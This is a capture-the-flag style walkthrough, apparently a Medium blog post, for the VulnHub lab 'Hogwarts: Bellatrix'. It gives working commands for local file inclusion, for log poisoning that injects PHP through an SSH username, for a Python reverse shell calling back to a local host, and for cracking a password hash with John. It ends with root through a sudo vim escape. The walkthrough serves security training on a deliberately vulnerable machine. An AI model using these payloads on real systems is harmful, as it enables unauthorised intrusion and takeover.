VulnHub: Hogwarts: Bellatrix

Today we will take a look at Vulnhub: Bellatrix. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

  • Network scan

Command: sudo nmap -p- -sV -sC -oN nmap/open — open 192.168.0.105

Nmap scan report for 192.168.0.113
Host is up (0.032s latency).
Not shown: 61087 closed tcp ports (reset), 4446 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.3p1 Ubuntu 1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 4b:ce:c7:5a:9c:1f:8b:cd:47:03:08:69:85:c2:91:49 (RSA)
| 256 a1:2a:a8:15:99:04:cc:2a:1e:e3:50:00:f3:55:c2:cc (ECDSA)
|_ 256 2c:d3:ec:6f:4f:5b:4a:e0:ea:0a:c3:0d:2f:cb:78:17 (ED25519)
80/tcp open http Apache httpd 2.4.46 ((Ubuntu))
|_http-title: AvadaKedavra
|_http-server-header: Apache/2.4.46 (Ubuntu)
MAC Address: 3C:A0:67:C5:35:33 (Liteon Technology)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • Web

After seeing the .php extension, we go there.

http://192.168.0.113/ikilledsiriusblack.php

There is such a thing in the source code below.

Yes, that’s what you think. Let’s check. ;)

http://192.168.0.113/ikilledsiriusblack.php?file=../../../../../../etc/passwd

We need to get the reverse shell from here. If we investigate, we find.

Let’s check

http://192.168.0.113/ikilledsiriusblack.php?file=../../../../../../var/log/auth.log

Command: ssh ‘<?php system($_GET[“cmd”]); ?>’@192.168.0.113

http://192.168.0.113/ikilledsiriusblack.php?file=../../../../../..//var/log/auth.log&cmd=ls%20-la

Yes it works.

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.107",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

After logging in

Command: script /dev/null -c bash

Command: export TERM=xterm

ctrl+z

Command: stty raw -echo ; fg

Command: reset

  • Lestrange

As we look inside, we see a folder whose name is encrypted with base64. There are two files in it. One is the password list and the other is the hash form of the name and password.

Command: john hash --wordlist=pass.txtUsing default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ihateharrypotter (lestrange)
1g 0:00:00:00 DONE (2022-05-22 20:52) 2.380g/s 273.8p/s 273.8c/s 273.8C/s gryffondor
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Command: su lestrange

  • Root

Command: sudo -l

(ALL : ALL) NOPASSWD: /usr/bin/vim

Command: sudo /usr/bin/vim -c ‘:!/bin/sh’

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store